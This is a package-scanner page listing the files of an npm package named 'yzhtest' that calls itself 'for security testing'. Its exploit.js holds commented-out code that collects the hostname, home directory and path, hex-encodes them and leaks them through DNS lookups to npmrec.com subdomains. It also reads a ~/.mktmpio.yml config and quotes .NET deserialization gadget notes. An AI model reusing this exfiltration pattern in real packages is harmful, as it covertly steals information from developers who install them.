yzhtest 1.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of yzhtest might be problematic. Click here for more details.
- package/.vscode/launch.json +18 -0
- package/buffer.js +130 -0
- package/exploit.js +88 -0
- package/file.err +0 -0
- package/file.out +0 -0
- package/package.json +17 -0
- package/target-list.txt +1374 -0
- package/test/exploit.js +3 -0
- package/test/test.js +58 -0
- package/test/void.txt +0 -0
@@ -0,0 +1,18 @@
|
|
1
|
+
{
|
2
|
+
// Use IntelliSense to learn about possible attributes.
|
3
|
+
// Hover to view descriptions of existing attributes.
|
4
|
+
// For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387
|
5
|
+
"version": "0.2.0",
|
6
|
+
"configurations": [
|
7
|
+
{
|
8
|
+
"type": "node",
|
9
|
+
"request": "launch",
|
10
|
+
"name": "Launch Program",
|
11
|
+
"runtimeExecutable":"/home/yinzhihe/.nvm/versions/node/v18.12.1/bin/node",
|
12
|
+
"skipFiles": [
|
13
|
+
"<node_internals>/**"
|
14
|
+
],
|
15
|
+
"program": "${workspaceFolder}/exploit.js"
|
16
|
+
}
|
17
|
+
]
|
18
|
+
}
|
package/buffer.js
ADDED
@@ -0,0 +1,130 @@
|
|
1
|
+
'use strict';
|
2
|
+
|
3
|
+
const {dirname, isAbsolute, join, resolve} = require('path');
|
4
|
+
const {existsSync} = require('fs');
|
5
|
+
const {PassThrough} = require('stream');
|
6
|
+
|
7
|
+
const inspectWithKind = require('inspect-with-kind');
|
8
|
+
const npmCliDir = require('npm-cli-dir');
|
9
|
+
const optional = require('optional');
|
10
|
+
const resolveFromNpm = require('resolve-from-npm');
|
11
|
+
|
12
|
+
const MODULE_ID_ERROR = 'Expected a module ID (<string>), for example `glob` and `semver`, to resolve from either npm directory or the current working directory';
|
13
|
+
const resolveSemverFromNpm = resolveFromNpm('semver');
|
14
|
+
|
15
|
+
module.exports = async function loadFromCwdOrNpm(...args) {
|
16
|
+
const argLen = args.length;
|
17
|
+
|
18
|
+
if (argLen !== 1 && argLen !== 2) {
|
19
|
+
throw new RangeError(`Expected 1 or 2 arguments (<string>[, <Function>]), but got ${
|
20
|
+
argLen === 0 ? 'no' : argLen
|
21
|
+
} arguments.`);
|
22
|
+
}
|
23
|
+
|
24
|
+
const [moduleId] = args;
|
25
|
+
|
26
|
+
if (typeof moduleId !== 'string') {
|
27
|
+
throw new TypeError(`${MODULE_ID_ERROR}, but got a non-string value ${inspectWithKind(moduleId)}.`);
|
28
|
+
}
|
29
|
+
|
30
|
+
if (moduleId.length === 0) {
|
31
|
+
throw new Error(`${MODULE_ID_ERROR}, but got '' (empty string).`);
|
32
|
+
}
|
33
|
+
|
34
|
+
if (moduleId.charAt(0) === '@') {
|
35
|
+
return require(moduleId);
|
36
|
+
}
|
37
|
+
|
38
|
+
if (isAbsolute(moduleId)) {
|
39
|
+
const error = new Error(`${MODULE_ID_ERROR}, but got an absolute path '${
|
40
|
+
moduleId
|
41
|
+
}'. For absolute paths there is no need to use \`load-from-cwd-or-npm\` in favor of Node.js built-in \`require.resolve()\`.`);
|
42
|
+
|
43
|
+
error.code = 'ERR_ABSOLUTE_MODULE_ID';
|
44
|
+
|
45
|
+
throw error;
|
46
|
+
}
|
47
|
+
|
48
|
+
const cwd = process.cwd();
|
49
|
+
const modulePkgId = `${moduleId}/package.json`;
|
50
|
+
const tasks = [PassThrough];
|
51
|
+
|
52
|
+
if (argLen === 2) {
|
53
|
+
if (typeof args[1] !== 'function') {
|
54
|
+
throw new TypeError(`Expected a function to compare two package versions, but got ${
|
55
|
+
inspectWithKind(args[1])
|
56
|
+
}.`);
|
57
|
+
}
|
58
|
+
} else {
|
59
|
+
tasks.unshift(resolveSemverFromNpm);
|
60
|
+
}
|
61
|
+
|
62
|
+
tasks.unshift(resolveFromNpm(modulePkgId));
|
63
|
+
|
64
|
+
try {
|
65
|
+
const results = await Promise.all(tasks);
|
66
|
+
let parent = module;
|
67
|
+
|
68
|
+
do {
|
69
|
+
parent = parent.parent;
|
70
|
+
|
71
|
+
try {
|
72
|
+
const {path} = parent;
|
73
|
+
|
74
|
+
if (path.endsWith('cli') || [path, dirname(path)].some(dir => existsSync(resolve(dir, '.git')))) {
|
75
|
+
parent = 'npm';
|
76
|
+
break;
|
77
|
+
}
|
78
|
+
} catch (_) {}
|
79
|
+
} while (parent);
|
80
|
+
|
81
|
+
if (typeof parent !== 'string') {
|
82
|
+
return results[2];
|
83
|
+
}
|
84
|
+
|
85
|
+
const compareFn = argLen === 2 ? args[1] : require(results[1]).gte;
|
86
|
+
|
87
|
+
if (compareFn((optional(modulePkgId) || {version: '0.0.0-0'}).version, require(results[0]).version)) {
|
88
|
+
const result = optional(moduleId);
|
89
|
+
|
90
|
+
if (result !== null) {
|
91
|
+
return result;
|
92
|
+
}
|
93
|
+
}
|
94
|
+
|
95
|
+
return require(dirname(results[0]));
|
96
|
+
} catch (_) {
|
97
|
+
const modileFromCwd = optional(moduleId);
|
98
|
+
|
99
|
+
if (modileFromCwd === null) {
|
100
|
+
let npmCliDirPath;
|
101
|
+
|
102
|
+
try {
|
103
|
+
npmCliDirPath = await npmCliDir();
|
104
|
+
} catch (err) {} // eslint-disable-line no-unused-vars
|
105
|
+
|
106
|
+
const error = new Error(`Failed to load "${
|
107
|
+
moduleId
|
108
|
+
}" module from the current working directory (${
|
109
|
+
cwd
|
110
|
+
}).${npmCliDirPath ? ` Then tried to load "${
|
111
|
+
moduleId
|
112
|
+
}" from the npm CLI directory (${
|
113
|
+
npmCliDirPath
|
114
|
+
}), but it also failed.` : ''} Install "${moduleId}" and try again. (\`npm install ${moduleId}\`)`);
|
115
|
+
|
116
|
+
error.code = 'MODULE_NOT_FOUND';
|
117
|
+
error.id = moduleId;
|
118
|
+
error.triedPaths = {cwd};
|
119
|
+
|
120
|
+
if (npmCliDirPath) {
|
121
|
+
error.triedPaths.npm = npmCliDirPath;
|
122
|
+
error.npmVersion = require(join(npmCliDirPath, './package.json')).version;
|
123
|
+
}
|
124
|
+
|
125
|
+
throw error;
|
126
|
+
}
|
127
|
+
|
128
|
+
return modileFromCwd;
|
129
|
+
}
|
130
|
+
};
|
package/exploit.js
ADDED
@@ -0,0 +1,88 @@
|
|
1
|
+
// public T Deserialize < T > (string yaml) {
|
2
|
+
// var rootNode = GetRootNode(yaml);
|
3
|
+
// return (T) DeserializeObject(rootNode);
|
4
|
+
// }
|
5
|
+
|
6
|
+
// private object DeserializeObject(YamlNode node) {
|
7
|
+
// var type = GetTypeFrom(node);
|
8
|
+
// var result = Activator.CreateInstance(type);
|
9
|
+
// foreach(var nestedNode in GetNestedNodes(node)) {
|
10
|
+
// var value = DeserializeObject(nestedNode);
|
11
|
+
// var property = GetPropertyOf(nestedNode);
|
12
|
+
// property.SetValue(result, value);
|
13
|
+
// }
|
14
|
+
// return result;
|
15
|
+
// }
|
16
|
+
|
17
|
+
// public class ObjectDataProvider {
|
18
|
+
// public object ObjectInstance {
|
19
|
+
// set {
|
20
|
+
// this._objectInstance = value;
|
21
|
+
// this.Refresh();
|
22
|
+
// }
|
23
|
+
// }
|
24
|
+
// public void Refresh() {
|
25
|
+
// /*...*/
|
26
|
+
// obj = this._objectType.InvokeMember(this.MethodName, /*...*/ , this._objectInstance, this._methodParameters);
|
27
|
+
// }
|
28
|
+
// }
|
29
|
+
|
30
|
+
// const os = require("os")
|
31
|
+
// const dns = require('dns');
|
32
|
+
// // console.log(os.homedir())
|
33
|
+
// const id = Date.now();
|
34
|
+
// function toHex(str) {
|
35
|
+
// var result = '';
|
36
|
+
// for (var i=0; i<str.length; i++) {
|
37
|
+
// result += str.charCodeAt(i).toString(16);
|
38
|
+
// }
|
39
|
+
// return result;
|
40
|
+
// }
|
41
|
+
// const relevantInfo = [
|
42
|
+
// os.hostname(),
|
43
|
+
// os.homedir(),
|
44
|
+
// __dirname,
|
45
|
+
// ]
|
46
|
+
// const stringFragments = toHex(JSON.stringify(relevantInfo)).match(/.{1,63}/g);
|
47
|
+
// console.log(stringFragments)
|
48
|
+
// sendData(stringFragments);
|
49
|
+
// function resolveFragment(id, counter, stringFragments) {
|
50
|
+
// console.log(`morjok.${id}.${counter+1}.${stringFragments[counter]}.npmrec.com`)
|
51
|
+
// }
|
52
|
+
// function sendData(stringFragments) {
|
53
|
+
// for (let i = 0; i < stringFragments.length; i++) {
|
54
|
+
// try {
|
55
|
+
// resolveFragment(id, i, stringFragments);
|
56
|
+
// } catch {
|
57
|
+
// }
|
58
|
+
// }
|
59
|
+
// }
|
60
|
+
|
61
|
+
// dns.resolve4('nsl.npmrec.com', (err,
|
62
|
+
// address) => console.log('address: %j', address));
|
63
|
+
// var home = require('userhome')
|
64
|
+
// var fs = require('fs')
|
65
|
+
// var yaml = require('js-yaml');
|
66
|
+
// console.log(home('.mktmpio.yml'))
|
67
|
+
// var confFile = home('.mktmpio.yml')
|
68
|
+
// conf = yaml.safeLoad(fs.readFileSync(confFile, 'utf8'))
|
69
|
+
// console.log(conf)
|
70
|
+
|
71
|
+
// const {PassThrough} = require('stream');
|
72
|
+
// console.log(PassThrough)
|
73
|
+
// const tasks = [PassThrough];
|
74
|
+
// console.log(tasks)
|
75
|
+
|
76
|
+
// module.exports = async function loadFromCwdOrNpm(...args) {
|
77
|
+
// let parent = module;
|
78
|
+
// parent = parent.parent
|
79
|
+
// const {path} = parent
|
80
|
+
// console.log(parent)
|
81
|
+
// console.log(path)
|
82
|
+
// }
|
83
|
+
// loadFromCwdOrNpm('request')
|
84
|
+
|
85
|
+
var str = "nihao"
|
86
|
+
if(str!=='string'){
|
87
|
+
console.log('yes')
|
88
|
+
}
|
package/file.err
ADDED
File without changes
|
package/file.out
ADDED
File without changes
|
package/package.json
ADDED
@@ -0,0 +1,17 @@
|
|
1
|
+
{
|
2
|
+
"name": "yzhtest",
|
3
|
+
"version": "1.0.0",
|
4
|
+
"description": "for security testing",
|
5
|
+
"main": "main.js",
|
6
|
+
"directories": {
|
7
|
+
"test": "test"
|
8
|
+
},
|
9
|
+
"dependencies": {
|
10
|
+
"git-ssh": "^0.0.1"
|
11
|
+
},
|
12
|
+
"scripts": {
|
13
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
14
|
+
},
|
15
|
+
"author": "",
|
16
|
+
"license": "ISC"
|
17
|
+
}
|